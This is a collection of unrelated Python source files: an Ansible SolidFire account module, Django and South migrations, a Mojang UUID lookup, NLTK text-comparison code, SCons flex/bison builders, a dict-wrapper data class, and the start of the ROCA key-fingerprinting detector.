self.account_id = account.account_id return account return None def create_account(self): try: self.sfe.add_account(username=self.name, initiator_secret=self.initiator_secret, target_secret=self.target_secret, attributes=self.attributes) except: err = get_exception() self.module.fail_json(msg='Error creating account %s' % self.name, exception=str(err)) def delete_account(self): try: self.sfe.remove_account(account_id=self.account_id) except: err = get_exception() self.module.fail_json(msg='Error deleting account %s' % self.account_id, exception=str(err)) def update_account(self): try: self.sfe.modify_account(account_id=self.account_id, username=self.new_name, status=self.status, initiator_secret=self.initiator_secret, target_secret=self.target_secret, attributes=self.attributes) except: err = get_exception() self.module.fail_json(msg='Error updating account %s' % self.account_id, exception=str(err)) def apply(self): changed = False account_exists = False update_account = False account_detail = self.get_account() if account_detail: account_exists = True if self.state == 'absent': changed = True elif self.state == 'present': # Check if we need to update the account if account_detail.username is not None and self.new_name is not None and \ account_detail.username != self.new_name: update_account = True changed = True elif account_detail.status is not None and self.status is not None \ and account_detail.status != self.status: update_account = True changed = True elif account_detail.initiator_secret is not None and self.initiator_secret is not None \ and account_detail.initiator_secret != self.initiator_secret: update_account = True changed = True elif account_detail.target_secret is not None and self.target_secret is not None \ and account_detail.target_secret != self.target_secret: update_account = True changed = True elif account_detail.attributes is not None and self.attributes is not None \ and account_detail.attributes != self.attributes: update_account = True changed = True else: if self.state == 'present': changed = True if changed: if self.module.check_mode: pass else: if self.state == 'present': if not account_exists: self.create_account() elif update_account: self.update_account() elif self.state == 'absent': self.delete_account() self.module.exit_json(changed=changed) def main(): v = SolidFireAccount() v.apply() if __name__ == '__main__': main()
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2008 Zuza Software Foundation # # This file is part of the Translate Toolkit. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, see <http://www.gnu.org/licenses/>. import os from tools.mozilla import moz_l10n_builder MOZDIR = os.path.join(os.path.expanduser('~'), 'mozbuild') def build_langs(langs, verbose): olddir = os.getcwd() os.chdir(MOZDIR) moz_l10n_builder.main( langs=langs, mozcheckout=True, recover=True, potpack=True, potincl=['README.mozilla-pot'], popack=True, update_trans=True, diff=False, langpack=True, verbose=verbose ) os.chdir(olddir) def check_potpacks(): """Copy new and check available POT-packs.""" pass def update_rss(): """Update the RSS feed with the available POT-packs.""" pass USAGE = '%prog [<options>]' def create_option_parser(): """Creates and returns cmd-line option parser.""" from argparse import ArgumentParser parser = ArgumentParser(usage=USAGE) parser.add_argument( '-q', '--quiet', dest='verbose', action='store_false', default=True, help='Print as little as possible output.' ) return parser def main(langs, verbose): if not langs: langs = ['ALL'] if not os.path.isdir(MOZDIR): os.makedirs(MOZDIR) build_langs(langs, verbose) check_potpacks() update_rss() def main_cmd_line(): """Processes command-line arguments and send them to main().""" args, langs = create_option_parser().parse_args() main(langs, args.verbose) if __name__ == '__main__': main_cmd_line()
# -*- coding: utf-8 -*- # Generated by Django 1.10.7 on 2017-09-10 18:01 from __future__ import unicode_literals import django.core.validators from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('pootle_store', '0033_remove_store_file'), ] operations = [ migrations.AlterField( model_name='qualitycheck', name='message', field=models.TextField(validators=[django.core.validators.MaxLengthValidator(4096)]), ), migrations.AlterField( model_name='unit', name='context', field=models.TextField(editable=False, null=True, validators=[django.core.validators.MaxLengthValidator(4096)]), ), migrations.AlterField( model_name='unit', name='developer_comment', field=models.TextField(blank=True, null=True, validators=[django.core.validators.MaxLengthValidator(4096)]), ), migrations.AlterField( model_name='unit', name='locations', field=models.TextField(editable=False, null=True, validators=[django.core.validators.MaxLengthValidator(4096)]), ), migrations.AlterField( model_name='unit', name='translator_comment', field=models.TextField(blank=True, null=True, validators=[django.core.validators.MaxLengthValidator(4096)]), ), ]
# Shamelessly stolen from https://github.com/Thezomg/mcapi/ # Based on Java from https://github.com/Mojang/AccountsClient/ import requests import json from requests.exceptions import ConnectionError class NoSuchUserException(Exception): pass AGENT = "minecraft" PROFILE_URL = "https://api.mojang.com/profiles/minecraft" UUID_PROFILE_URL = 'https://sessionserver.mojang.com/session/minecraft/profile/{uuid}' class ProfileCriteria(dict): def __init__(self, name, agent): self['name'] = name self['agent'] = agent def get_profile(uuid, timeout=10): url = UUID_PROFILE_URL.format(uuid=uuid) try: r = requests.get(url, timeout=timeout) profile = r.json() except: profile = None return profile def get_uuid(*name, **kwargs): timeout = 10 if "timeout" in kwargs: timeout = kwargs["timeout"] if len(name) == 0: return None p = [] page = 1 while True: if len(name) == 0: break crit = name[:100] name = name[100:] data = json.dumps(crit) headers = {'Content-type': 'application/json', 'Accept': 'application/json'} r = requests.post(PROFILE_URL, data=data, headers=headers, timeout=timeout) profiles = r.json() p.extend(profiles) page += 1 return p def lookup_uuid(username): res = get_uuid(username) if not res: raise ConnectionError() for result in res: if result.get(u"name", None).lower() == username.lower(): return result.get(u"id", None) raise NoSuchUserException("no user exists with the username '%s'" % username) def lookup_uuid_name(username): res = get_uuid(username) if not res: raise ConnectionError() for result in res: if result.get(u"name", None).lower() == username.lower(): return result.get(u"id", None), result.get(u"name") raise NoSuchUserException("no user exists with the username '%s'" % username) def lookup_name(uuid): res = get_profile(uuid) if not res: raise ConnectionError() if not res.get(u'name'): raise NoSuchUserException("no user exists with the uuid '%s'" % uuid) return res.get(u'name') def validate_uuid(uuid): if len(uuid) != 32: return False try: int(uuid, 16) except ValueError: return False return True def uuid_type(value): if not validate_uuid(value): raise TypeError("'%s' is not a valid uuid" % value) return value
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding model 'Item' db.create_table('books_item', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('name', self.gf('django.db.models.fields.CharField')(max_length=50)), ('cost', self.gf('django.db.models.fields.DecimalField')(max_digits=8, decimal_places=2)), ('quantity', self.gf('django.db.models.fields.PositiveIntegerField')(blank=True)), )) db.send_create_signal('books', ['Item']) # Adding model 'Time' db.create_table('books_time', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('task', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['books.Task'], null=True, blank=True)), ('notes', self.gf('django.db.models.fields.CharField')(max_length=1000)), ('rate_per_hour', self.gf('django.db.models.fields.PositiveIntegerField')(blank=True)), ('time', self.gf('django.db.models.fields.PositiveIntegerField')(blank=True)), )) db.send_create_signal('books', ['Time']) def backwards(self, orm): # Deleting model 'Item' db.delete_table('books_item') # Deleting model 'Time' db.delete_table('books_time') models = { 'auth.group': { 'Meta': {'object_name': 'Group'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'books.client': { 'Meta': {'object_name': 'Client'}, 'city': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'country': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '100'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'organization_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'phone': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'postal_code': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'state': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'street_adress': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}) }, 'books.expense': { 'Meta': {'object_name': 'Expense'}, 'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}) }, 'books.invoice': { 'Meta': {'object_name': 'Invoice'}, 'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'client': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['books.Client']"}), 'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'date_of_issue': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'invoice_number': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True'}), 'last_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}), 'notes': ('django.db.models.fields.CharField', [], {'max_length': '1000'}), 'terms': ('django.db.models.fields.CharField', [], {'max_length': '1000'}) }, 'books.item': { 'Meta': {'object_name': 'Item'}, 'cost': ('django.db.models.fields.DecimalField', [], {'max_digits': '8', 'decimal_places': '2'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'quantity': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True'}) }, 'books.project': { 'Meta': {'object_name': 'Project'}, 'client': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['books.Client']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'rate_per_hour': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True'}) }, 'books.task': { 'Meta': {'object_name': 'Task'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['books.Project']"}), 'rate_per_hour': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True'}) }, 'books.tax': { 'Meta': {'object_name': 'Tax'}, 'compound_tax': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '20'}), 'number': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True'}), 'rate': ('django.db.models.fields.PositiveIntegerField', [], {}) }, 'books.time': { 'Meta': {'object_name': 'Time'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'notes': ('django.db.models.fields.CharField', [], {'max_length': '1000'}), 'rate_per_hour': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True'}), 'task': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['books.Task']", 'null': 'True', 'blank': 'True'}), 'time': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True'}) }, 'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) } } complete_apps = ['books']
import itertools import logging import string import math from retrying import retry import nltk from .encodedEntity import EncodedEntity from .textHelper import removeNonAsciiChars #nltk.download('punkt') #nltk.download('stopwords') #nltk.download('maxent_treebank_pos_tagger') #nltk.download('maxent_ne_chunker') #nltk.download('averaged_perceptron_tagger') #nltk.download('words') def _removePuntuation(text): return text.translate(str.maketrans('','',string.punctuation)) def hasNumbers(inputString): return any(char.isdigit() for char in inputString) def getSentences(text): return nltk.sent_tokenize(text) def getDigitForToken(token): digitsDict = { 'one': '1', 'two': '2', 'three': '3', 'four': '4', 'five': '5', 'six': '6', 'seven': '7', 'eight': '8', 'nine': '9', 'ten': '10', 'eleven': '11', 'twelve': '12', 'thirteen': '13', 'fourteen': '14', 'fifteen': '15', 'sixteen': '16', 'seventeen': '17', 'eighteen': '18', 'nineteen': '19' } return digitsDict.get(token, token) def replaceWordTokensWithDigits(tokens): return [getDigitForToken(token) for token in tokens] def getTokens(text): text = removeNonAsciiChars(text) lowers = text.lower() no_punctuation = _removePuntuation(lowers) tokens = nltk.word_tokenize(no_punctuation) tokens = replaceWordTokensWithDigits(tokens) return tokens def getShingles(text, minLength, maxLength): if text is None: return [] tokens = getTokens(text) shingles = [] for length in range(minLength, maxLength + 1): shingles = shingles + \ [" ".join(tokens[i:i+length]) for i in range(len(tokens) - length + 1)] return shingles def compareUsingShingles(text1, text2): text1ShinglesSet = set(getShingles(text1, 3, 3)) text2ShinglesSet = set(getShingles(text2, 3, 3)) intersection = text1ShinglesSet.intersection(text2ShinglesSet) shorterLen = min(len(text1ShinglesSet), len(text2ShinglesSet)) if shorterLen == 0: return 0 else: denominator = max(shorterLen, 250) comparisionScore = float(len(intersection))/denominator comparisionScore = min(comparisionScore, 1.0) return comparisionScore def compareTitles(title1, title2): title1Tokens = set(getTokens(title1)) title2Tokens = set(getTokens(title2)) intersection = title1Tokens.intersection(title2Tokens) shorterLen = min(len(title1Tokens), len(title2Tokens)) if shorterLen == 0: return 0 else: comparisionScore = float(len(intersection))/shorterLen return comparisionScore @retry(stop_max_attempt_number=3) def getEntitiesInternal(text): if not text: return [] text = removeNonAsciiChars(text) sentences = nltk.sent_tokenize(text) sentences = [nltk.word_tokenize(sent) for sent in sentences] sentences = [nltk.pos_tag(sent) for sent in sentences] entities = [] for sentence in sentences: extractedEntities = nltk.ne_chunk(sentence, binary=True).subtrees( filter = lambda x: x.label() == 'NE') for entity in extractedEntities: newEntity = ' '.join([leaf[0] for leaf in entity.leaves()]) entities.append(newEntity) return list(set(entities)) def getEntities(text): try: return getEntitiesInternal(text) except Exception as e: logging.info("Could not extract entities for text: '%s'", text) return [] def compareEntities(entity1, entity2, doc1EntityWeights, doc2EntityWeights): entity1Weigth = doc1EntityWeights.get(entity1, 0.8) entity1 = EncodedEntity(entity1) entity2Weigth = doc2EntityWeights.get(entity2, 0.8) entity2 = EncodedEntity(entity2) combinedWeight = entity1Weigth * entity2Weigth if entity1.encoded == entity2.encoded: return 1.0 * combinedWeight else: entity1Words = set(entity1.encoded.split()) entity2Words = set(entity2.encoded.split()) commonWords = entity1Words.intersection(entity2Words) if len(commonWords) > 0: return combinedWeight * \ float(len(commonWords)*2)/(len(entity1Words) + len(entity2Words)) else: return 0.0 def compareTextEntities(text1, text2, doc1EntityWeights, doc2EntityWeights): text1Entities = set(getEntities(text1)) text2Entities = set(getEntities(text2)) entityPairSimilarities = [compareEntities(x[0], x[1], doc1EntityWeights, doc2EntityWeights) for x in itertools.product(text1Entities, text2Entities)] if len(entityPairSimilarities) == 0: return 0 else: lessNumberOfEntities = min(len(text1Entities), len(text2Entities)) score = float(sum(entityPairSimilarities))/(math.pow(3*lessNumberOfEntities, 0.6)) if (score >= 1.0): return 1.0 else: return score def getImportantSentences(text): sentences = getSentences(removeNonAsciiChars(text)) importantSentences= [] for sentence in sentences: nEntities = len(getEntities(sentence)) if nEntities > 3 and nEntities < 6: importantSentences.append(sentence) elif nEntities == 3: if " said " in sentence or " told " in sentence or hasNumbers(sentence): importantSentences.append(sentence) # Filter out sentences that are too long. importantSentences = [s for s in importantSentences if len(s)<350] # Filter out marketing sentences. wordsToFilter = ['download', 'android'] for wordToFilter in wordsToFilter: importantSentences = [s for s in importantSentences if wordToFilter not in s.lower()] return importantSentences
# -------------------------------------------------------------------------- # # Copyright 2002-2013, OpenNebula Project (OpenNebula.org), C12G Labs # # # # Licensed under the Apache License, Version 2.0 (the "License"); you may # # not use this file except in compliance with the License. You may obtain # # a copy of the License at # # # # http://www.apache.org/licenses/LICENSE-2.0 # # # # Unless required by applicable law or agreed to in writing, software # # distributed under the License is distributed on an "AS IS" BASIS, # # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # # See the License for the specific language governing permissions and # # limitations under the License. # #--------------------------------------------------------------------------- # import os import SCons ############ # BUILDERS # ############ def build_lex(target, source, env): cwd=os.getcwd() src=SCons.Util.to_String(source[0]) src_dir=os.path.dirname(src) src_name=os.path.basename(src) os.chdir(src_dir) os.system("flex "+src_name) os.chdir(cwd) return None def emitter_lex(target, source, env): src=SCons.Util.to_String(source[0]) src_dir=os.path.dirname(src) (src_name, src_ext)=os.path.splitext(os.path.basename(src)) target.append(src_name+".h") return target, source def add_lex(environment): lex_bld=SCons.Builder.Builder(action=build_lex, suffix='.c', src_suffix='.l', emitter=emitter_lex) environment.Append(BUILDERS={'Lex':lex_bld}) def build_bison(target, source, env): cwd=os.getcwd() src=SCons.Util.to_String(source[0]) src_dir=os.path.dirname(src) src_name=os.path.basename(src) (base, ext)=os.path.splitext(src_name) os.chdir(src_dir) os.system("bison "+src_name) os.rename(base+".hh", base+".h") os.chdir(cwd) return None def emitter_bison(target, source, env): src=SCons.Util.to_String(source[0]) src_dir=os.path.dirname(src) (src_name, src_ext)=os.path.splitext(os.path.basename(src)) target.append(src_name+".h") return target, source def add_bison(environment): bison_bld=SCons.Builder.Builder(action=build_bison, suffix='.cc', src_suffix='.y', emitter=emitter_bison) environment.Append(BUILDERS={'Bison':bison_bld})
#!/usr/bin/env python # # Copyright 2013 Facebook # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from __future__ import (absolute_import, division, print_function, unicode_literals) import weakref class Raw(object): """Wrapper to tell Object not to rewrap but just store the value""" def __init__(self, value): self.value = value #A Sentinel value because None is a valid value sentinel = object() class Object(dict): """ Pretty DataStructure Objects with lots of magic All Collections added to this object will be converted to data.Collection if they are not already and instance of that type All Dicts added to this class will be converted to data.Object's if they are not currently instances of data.Object To prevent any conversions from taking place in a value place in a data.Object use data.Raw(myobject) to tell data.Object to store it as is. """ #dir(self) causes these to be getattr'ed #Its a weird python artifact __members__ = None __methods__ = None def __init__(self, *args, **kwargs): #Look to see if this object should be somebodies child once not empty if kwargs.get('__PARENT__'): self.__dict__['__PARENT__'] = kwargs.pop('__PARENT__') super(Object, self).__init__(*args, **kwargs) #A place to store future children before they are actually children self.__dict__['__CACHE__'] = weakref.WeakValueDictionary() #Read Only Keys self.__dict__['__PROTECTED__'] = set() #Make sure all children are Object not dict #Also handle 'a.b.c' style keys for k in self.keys(): self[k] = self.pop(k) def __wrap(self, value): if isinstance(value, (tuple, set, frozenset)): return type(value)([self.__wrap(v) for v in value]) elif isinstance(value, list) and not isinstance(value, Collection): return Collection(value, self.__class__) elif isinstance(value, Object): return value # Don't Rewrap if already this class. elif isinstance(value, Raw): return value.value elif isinstance(value, dict): if isinstance(self, CaseInsensitiveObject): return CaseInsensitiveObject(value) else: return Object(value) else: return value def __protect__(self, key, value=sentinel): """Protected keys add its parents, not sure if useful""" if not isinstance(key, list): key = key.split('.') if isinstance(key, basestring) else [key] key, path = key.pop(0), key if len(path) > 0: self.get(key).protect(path, value) elif value is not sentinel: self[key] = value if key not in self: raise KeyError('key %s has no value to protect' % key) self.__PROTECTED__.add(key) #Object.key sets def __setattr__(self, name, value): bad_ids = dir(self) #Add some just for causion bad_ids.append('__call__') bad_ids.append('__dir__') if name in self.__PROTECTED__: raise KeyError('key %r is read only' % name) if name not in bad_ids: if self.__dict__.get('__PARENT__'): #Do all the black magic with making sure my parents exist parent, pname = self.__dict__.pop('__PARENT__') parent[pname] = self #Get rid of cached future children that match name if name in self.__CACHE__: del self.__CACHE__[name] dict.__setitem__(self, name, self.__wrap(value)) else: print("%s is an invalid identifier" % name) print("identifiers can not be %r" % bad_ids) raise KeyError('bad identifier') #Object.key gets def __getattr__(self, key): return self.get(key) #Dict like functionality and xpath like access def __getitem__(self, key, default=sentinel): if not isinstance(key, list): key = key.split('.') if isinstance(key, basestring) else [key] key, path = key.pop(0), key if len(path) > 0: return self.get(key).__getitem__(path, default) elif key not in self: if default is sentinel: #Return a parentless object (this might be evil) #CACHE it return self.__CACHE__.setdefault( key, self.__class__(__PARENT__=(self, key))) else: return default else: return dict.get(self, key) get = __getitem__ def __contains__(self, key): """ contains method with key paths support """ if not isinstance(key, list): key = key.split('.') if isinstance(key, basestring) else [key] this, next = key.pop(0), key if this in self.iterkeys(): if len(next) > 0: return next in self.get(this) else: return True else: return False has_key = __contains__ def setdefault(self, key, default=None): if key not in self: self[key] = default return self.get(key) #Allow address keys 'key.key.key' def __setitem__(self, key, value): if not isinstance(key, list): key = key.split('.') if isinstance(key, basestring) else [key] key, path = key.pop(0), key if len(path) > 0: self.setdefault(key, {}).__setitem__(path, value) else: self.__setattr__(key, value) set = __setitem__ #Allow del by 'key.key.key' def __delitem__(self, key): if not isinstance(key, list): key = key.split('.') if isinstance(key, basestring) else [key] key, path = key.pop(0), key if len(path) > 0: self.get(key).__delitem__(path) # Pass the delete down else: if key not in self: pass # This should handle itself else: dict.__delitem__(self, key) __delattr__ = __delitem__ class CaseInsensitiveObject(Object): """A Case Insensitive Version of data.Object""" def __protect__(self, key, value=sentinel): Object.__protect__(self, key.lower(), value) def __getitem__(self, key, default=sentinel): if isinstance(key, list): key = [x.lower() if isinstance(x, basestring) else x for x in key] elif isinstance(key, basestring): key = key.lower() return Object.__getitem__(self, key, default) get = __getitem__ def __setattr__(self, key, value): if isinstance(key, basestring): key = key.lower() return Object.__setattr__(self, key, value) def __contains__(self, key): if not isinstance(key, list): key = key.split('.') if isinstance(key, basestring) else [key] if isinstance(key[0], basestring): key[0] = key[0].lower() return Object.__contains__(self, key) has_key = __contains__ def __getattr__(self, key): if key in self: return self.get(key) else: return Object.__getattr__(self, key) def __delattr__(self, key): if isinstance(key, basestring): key = key.lower() return Object.__delattr__(self, key) __delitem__ = __delattr__ class Collection(list): """Special Lists so [dicts,[dict,dict]] within get converted""" def __init__(self, alist=None, default=Object): if alist is None: alist = () super(Collection, self).__init__(alist) self.__default = default #Makes sure all the conversions happen for i in xrange(0, len(self)): self[i] = self[i] def __wrap(self, value): if isinstance(value, dict): return self.__default(value) elif isinstance(value, self.__class__): return value # Do Not Re-wrap elif isinstance(value, list): return self.__class__(value, self.__default) else: return value def __setitem__(self, key, value): super(Collection, self).__setitem__(key, self.__wrap(value)) def __getslice__(self, s, e): return self.__class__(super(Collection, self).__getslice__(s, e), self.__default) def append(self, value): list.append(self, self.__wrap(value)) def extend(self, alist): for i in alist: self.append(i) def insert(self, key, value): list.insert(self, key, self.__wrap(value)) def shift(self): return self.pop(0) def unshift(self, value): self.insert(0, value) push = append
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Key fingerprinting The fingerprinter supports the following formats: - X509 Certificate, DER encoded, one per file, *.der, *.crt - X509 Certificate, PEM encoded, more per file, *.pem - RSA PEM encoded private key, public key, more per file, *.pem (has to have correct header -----BEGIN RSA...) - SSH public key, *.pub, starting with "ssh-rsa", one per line - ASC encoded PGP key, *.pgp, *.asc. More per file, has to have correct header -----BEGIN PGP... - APK android application, *.apk - one modulus per line text file *.txt, modulus can be a) base64 encoded number, b) hex coded number, c) decimal coded number - JSON file with moduli, one record per line, record with modulus has key "mod" (int, base64, hex, dec encoding supported) certificate(s) with key "cert" / array of certificates with key "certs" are supported, base64 encoded DER. - LDIFF file - LDAP database dump. Any field ending with ";binary::" is attempted to decode as X509 certificate - Java Key Store file (JKS). Tries empty password & some common, specify more with --jks-pass-file - PKCS7 signature with user certificate. Script requirements: - Tested on Python 2.7.13, 3.4, 3.5, 3.6 - pip install cryptography pgpdump coloredlogs future six pycrypto>=2.6 python-dateutil pyx509_ph4 apk_parse_ph4 pyjks M2Crypto - some system packages are usually needed for pip to install dependencies (like gcc): sudo sudo yum install python-devel python-pip gcc gcc-c++ make automake autoreconf libtool openssl-devel libffi-devel dialog sudo apt-get install python-pip python-dev build-essential libssl-dev libffi-dev https://github.com/crocs-muni/roca https://roca.crocs.fi.muni.cz """ from future.utils import iteritems from builtins import bytes from past.builtins import basestring from past.builtins import long from functools import reduce import json import argparse import logging import coloredlogs import base64 import hashlib import sys import os import re import math import itertools import binascii import collections import traceback import datetime from math import ceil, log # '%(asctime)s %(hostname)s %(name)s[%(process)d] %(levelname)s %(message)s' LOG_FORMAT = '%(asctime)s [%(process)d] %(levelname)s %(message)s' logger = logging.getLogger(__name__) coloredlogs.install(level=logging.INFO, fmt=LOG_FORMAT) # # Helper functions & classes # def strip_hex_prefix(x): """ Strips possible hex prefixes from the strings :param x: :return: """ if startswith(x, '0x'): return x[2:] if startswith(x, '\\x'): return x[2:] return x def error_message(e, message=None, cause=None): """ Formats exception message + cause :param e: :param message: :param cause: :return: formatted message, includes cause if any is set """ if message is None and cause is None: return None elif message is None: return '%s, caused by %r' % (e.__class__, cause) elif cause is None: return message else: return '%s, caused by %r' % (message, cause) def format_pgp_key(key): """ Formats PGP key in 16hex digits :param key: :return: """ if key is None: return None if isinstance(key, (int, long)): return '%016x' % key elif isinstance(key, list): return [format_pgp_key(x) for x in key] else: key = key.strip() key = strip_hex_prefix(key) return format_pgp_key(int(key, 16)) def defval(val, default=None): """ Returns val if is not None, default instead :param val: :param default: :return: """ return val if val is not None else default def defvalkey(js, key, default=None, take_none=True): """ Returns js[key] if set, otherwise default. Note js[key] can be None. :param js: :param key: :param default: :param take_none: :return: """ if js is None: return default if key not in js: return default if js[key] is None and not take_none: return default return js[key] def drop_none(arr): """ Drop none from the list :param arr: :return: """ if arr is None: return arr return [x for x in arr if x is not None] def drop_empty(arr): """ Drop empty array element :param arr: :return: """ return [x for x in arr if not isinstance(x, list) or len(x) > 0] def add_res(acc, elem): """ Adds results to the accumulator :param acc: :param elem: :return: """ if not isinstance(elem, list): elem = [elem] if acc is None: acc = [] for x in elem: acc.append(x) return acc def flatten(iterable): """ Non-recursive flatten. :param iterable: :return: """ try: iterator, sentinel, stack = iter(iterable), object(), [] except TypeError: yield iterable return while True: value = next(iterator, sentinel) if value is sentinel: if not stack: break iterator = stack.pop() elif isinstance(value, str): yield value else: try: new_iterator = iter(value) except TypeError: yield value else: stack.append(iterator) iterator = new_iterator def try_get_dn_part(subject, oid=None): """ Tries to extracts the OID from the X500 name. :param subject: :param oid: :return: """ try: if subject is None: return None if oid is None: return None for sub in subject: if oid is not None and sub.oid == oid: return sub.value except: pass return None def try_get_dn_string(subject, shorten=False): """ Returns DN as a string :param subject: :param shorten: :return: """ try: from cryptography.x509.oid import NameOID from cryptography.x509 import ObjectIdentifier oid_names = { getattr(NameOID, 'COMMON_NAME', ObjectIdentifier("2.5.4.3")): "CN", getattr(NameOID, 'COUNTRY_NAME', ObjectIdentifier("2.5.4.6")): "C", getattr(NameOID, 'LOCALITY_NAME', ObjectIdentifier("2.5.4.7")): "L", getattr(NameOID, 'STATE_OR_PROVINCE_NAME', ObjectIdentifier("2.5.4.8")): "ST", getattr(NameOID, 'STREET_ADDRESS', ObjectIdentifier("2.5.4.9")): "St", getattr(NameOID, 'ORGANIZATION_NAME', ObjectIdentifier("2.5.4.10")): "O", getattr(NameOID, 'ORGANIZATIONAL_UNIT_NAME', ObjectIdentifier("2.5.4.11")): "OU", getattr(NameOID, 'SERIAL_NUMBER', ObjectIdentifier("2.5.4.5")): "SN", getattr(NameOID, 'USER_ID', ObjectIdentifier("0.9.2342.19200300.100.1.1")): "userID", getattr(NameOID, 'DOMAIN_COMPONENT', ObjectIdentifier("0.9.2342.19200300.100.1.25")): "domainComponent", getattr(NameOID, 'EMAIL_ADDRESS', ObjectIdentifier("1.2.840.113549.1.9.1")): "emailAddress", getattr(NameOID, 